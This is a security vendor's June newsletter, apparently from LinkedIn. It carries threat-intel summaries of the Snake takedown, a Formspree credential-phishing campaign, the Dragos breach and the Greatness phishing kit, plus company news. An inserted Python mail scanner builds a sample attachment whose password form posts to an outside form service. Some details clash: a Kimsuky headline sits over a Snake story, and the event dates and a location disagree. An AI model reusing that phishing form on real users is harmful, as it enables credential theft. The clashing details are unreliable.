June | The Watch: A Summer of Cyber Awareness
Welcome to the June Edition of The Watch, featuring cyber intel from Deepwatch, information security news, industry insights, and upcoming Deepwatch events. Hit the subscribe button to stay in the know!
IN THIS ISSUE:
On-Demand Webinar - Deep Dive: 2023 Threat Report
Acting as a companion to Deepwatch’s recently published 2023 ATI Threat Report, this webinar presentation brings in senior threat intelligence leadership to discuss relevant statistics, metrics, and predictions relating to the report’s cyber threat findings for 2022 and 2023.
Insights Blog: SecOps Outsourcing: The Benefits of this Strategic Cybersecurity Approach
Written by: Bill Bernard, AVP, Security Strategy
Hear from Deepwatch AVP of Security Strategy Bill Bernard as he discusses the SecOps outsourcing pain points that modern CISOs are struggling with, and why the outsourced capabilities of services like MDR are the best long-term option from both a business and talent-retention perspective.
Deepwatch Cyber Threat Intelligence
Deepwatch provides curated cybersecurity threat intelligence to keep your organization and SOC ahead of the latest security threats and zero-day vulnerabilities. Below are a few top cyber threats & insights from the past month.
Kimsuky Malware Observed in Latest Campaign Updated With New Recon Component
What Happened
On 09 May 2023, the Justice Department announced the completion of an operation (Operation MEDUSA) to disrupt the Snake malware’s network of approximately 15 to 25 US-based compromised computers “used in or affecting interstate or foreign commerce or communication,” located in California, New York, Oregon, South Carolina, Georgia, Connecticut, and Maryland. Additionally, a Joint Cybersecurity Advisory was issued to help organizations detect and remove Snake malware infections. The operation permanently disabled Snake malware on US-based compromised computers that meet the US definition of a “protected computer,” which is a computer “used in or affecting interstate or foreign commerce or communication.”
Cybercriminal Abuses Form Service Provider to Steal Credentials
What Happened
On 08 May 2023, McAfee reported a phishing campaign primarily targeting the US, using an attached server-parsed HTML (.shtml) file to steal credentials. The attachment code displays a fake sign-in popup box and sends the entered credentials to the form service provider Formspree, which forwards them to an email address. The cybercriminals are likely targeting opportunistically, rather than pursuing specific organizations or industries, and against a limited to moderate number of organizations, to avoid exceeding form service providers’ free plan submission limits.
Cybercriminals Impersonate New Hire, Gain Access, Steal Data
What Happened
In a recent incident, industrial cybersecurity company Dragos was targeted by a criminal group in a data breach attempt, which involved the exfiltration of sensitive data and intense pressure tactics. The breach, encompassing approximately 130GB+ of data, included personal information concerning Dragos executives and their family members. This cybercriminal organization, driven by financial gain and coercion, displayed proficiency in social engineering techniques and data exfiltration.
Despite the group's attempts to extort the company using various tactics, Dragos chose not to negotiate or engage with the cybercriminals, opting instead to actively contain the breach and collaborate with external incident response partners. Measures to prevent future incidents are being implemented, such as fortifying identity and access management infrastructure, enforcing the principle of least privilege, and implementing multi-factor authentication. Dragos has also stressed the gravity of the breach, emphasizing the importance of not downplaying its severity.
Greatness Phishing-as-a-Service: Targeting Strategies, Tactics, and Countermeasures
What Happened
Cisco Talos has uncovered a phishing-as-a-service (PaaS) platform called Greatness, which has been utilized in multiple phishing campaigns since mid-2022. This alarming discovery raises critical questions about the identifiable patterns in Greatness’ targeting strategy, the tactics employed, and the methods used to bypass multi-factor authentication (MFA). Industries such as manufacturing, healthcare, and technology, primarily located in the US, the UK, Australia, South Africa, and Canada, are at higher risk of falling victim to the malicious schemes orchestrated by Greatness.
To mitigate the impact of the Greatness PaaS, organizations are advised to evaluate the risk of allowing HTML attachments in emails and block them if necessary. By adhering to this recommendation and implementing robust threat hunting practices, businesses can enhance their cybersecurity defenses. The discovery of Greatness serves as a stark reminder that the threat landscape continues to evolve, demanding heightened awareness and proactive measures to safeguard sensitive information and networks.
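To make the HTML-attachment recommendation concrete, and to show what the .shtml credential form described in the Formspree item looks like to a mail filter, here is an added example (not Deepwatch, McAfee, or Cisco Talos code). It parses a raw message and flags HTML-family attachments that contain a password field and a form posting to a remote host. The function names, the sample message, and the `EXAMPLE_ID` form endpoint are constructed for illustration.

```python
import email
from email import policy
from email.message import EmailMessage
from html.parser import HTMLParser
from urllib.parse import urlparse

HTML_EXTS = (".html", ".htm", ".shtml", ".xhtml")  # attachment types to inspect

class FormScan(HTMLParser):
    """Collect form action URLs and note any password input."""
    def __init__(self):
        super().__init__()
        self.actions, self.has_password = [], False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and a.get("action"):
            self.actions.append(a["action"])
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.has_password = True

def scan_message(raw_bytes):
    """Return one finding per HTML-family attachment in a raw RFC 5322 message."""
    msg = email.message_from_bytes(raw_bytes, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        if not (name.endswith(HTML_EXTS) or part.get_content_type() == "text/html"):
            continue
        scan = FormScan()
        scan.feed(part.get_payload(decode=True).decode("utf-8", "replace"))
        hosts = sorted({h for h in (urlparse(u).hostname for u in scan.actions) if h})
        findings.append({"filename": name, "remote_form_hosts": hosts,
                         # a local file that collects a password and posts it off-box
                         "credential_form": scan.has_password and bool(hosts)})
    return findings

def build_sample():
    """Constructed test message: one credential-form attachment, one benign."""
    m = EmailMessage()
    m["Subject"] = "Invoice (constructed sample)"
    m.set_content("See attached.")
    m.add_attachment('<form action="https://formspree.io/f/EXAMPLE_ID" method="post">'
                     '<input type="password" name="pw"></form>',
                     subtype="html", filename="Invoice.shtml")
    m.add_attachment("<h1>Quarterly report</h1>", subtype="html", filename="report.html")
    return m.as_bytes()

if __name__ == "__main__":
    for finding in scan_message(build_sample()):
        print(finding)
```

A gateway that cannot block HTML attachments outright can quarantine on `credential_form` and report `remote_form_hosts` to the hunt team.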
Subscribe to Deepwatch Labs to stay up-to-date on the latest cyber threat intelligence, advisories, and recommendations.
Deepwatch May Events
Women of the Channel West Conference in Palm Springs!
The women of Deepwatch were in attendance at this year’s Women of the Channel event down in sunny Palm Springs, FL! This event was packed with workshops, motivational speakers, networking opportunities, and more, all aimed at helping women develop their personal, professional and corporate goals.
Iroquois Steeplechase event in Nashville with AWS!
Members of the Deepwatch team also broke out their finest spring attire and the loudest hats they could find for the Iroquois Steeplechase event down in Nashville, TN!
ePlus inc. Transform 2023!
The Deepwatch leadership team was honored to support our ongoing partnership with ePlus by attending ePlus Transform 2023, a collaborative event to kick off their 2024 fiscal year. This event brought together over 800 people including employees and strategic technology partners.
ATI Threat Report Infographic
This Threat Report infographic provides an overview of the leading cybersecurity threats that SOC security analysts faced in 2022 including the top techniques, threat detections, and observations.
In addition, the Adversary Tactics & Intelligence (ATI) experts offer some predictions of what security teams will likely face in 2023 as described in the Deepwatch 2023 Annual Threat Report.
Deepwatch News!
Deepwatch Received a Record Number of Industry Awards!
We're excited to have received a record number of industry awards in a momentous start to 2023. These awards build on a year of remarkable company achievements, including 100 percent year-over-year sales growth, major expansions of Deepwatch’s leadership team, and securing $180 million in investment to accelerate growth.
We have received these awards for our team's commitment to innovation, employee satisfaction, and company leadership.
We've reached 20,000 followers on LinkedIn!
Last month, Deepwatch reached the 20,000 follower milestone here on LinkedIn! We appreciate our community for following along and supporting us as we work to provide engaging content that keeps you informed and protected.
Trending Infosec Updates
Employee Spotlight
This month's Employee Spotlight and Radical Performer is Zachary W., Principal Cloud Architect, who is recognized for his commitment to excellence! As someone with a leader's mindset, read what Zac believes makes a great team.
ICYMI...
Wesley M., Deepwatch CTO, illustrates the makeup of our Squad Delivery model
UPCOMING EVENTS...
AWS re:Inforce | July 13-14
Come see Deepwatch at AWS re:Inforce 2023 happening from June 13-14 in Anaheim, CA.
We’ll have a booth on the showroom floor and a private meeting space for scheduled MDR demos.
We’ll also be hosting a fun pre-event happy hour with Lacework and GuidePoint Security on the evening of June 12 for those who show up to the event early. View more information here.
About Deepwatch
Deepwatch is the leader in managed detection and response, protecting organizations from growing cyber threats 24/7/365. Powered by the Deepwatch SecOps Platform, we provide the industry’s fastest, most comprehensive detection and automated response to cyber threats along with tailored guidance from dedicated experts to mitigate risk and measurably improve security posture. Hundreds of organizations, from Fortune 100 to mid-sized enterprises, trust Deepwatch to protect their business. Visit www.deepwatch.com to learn more.
Next Trend Realty LLC./wwwHar.com/Chester-Swanson/agent_cbswan
1 year ago: Thanks for Sharing.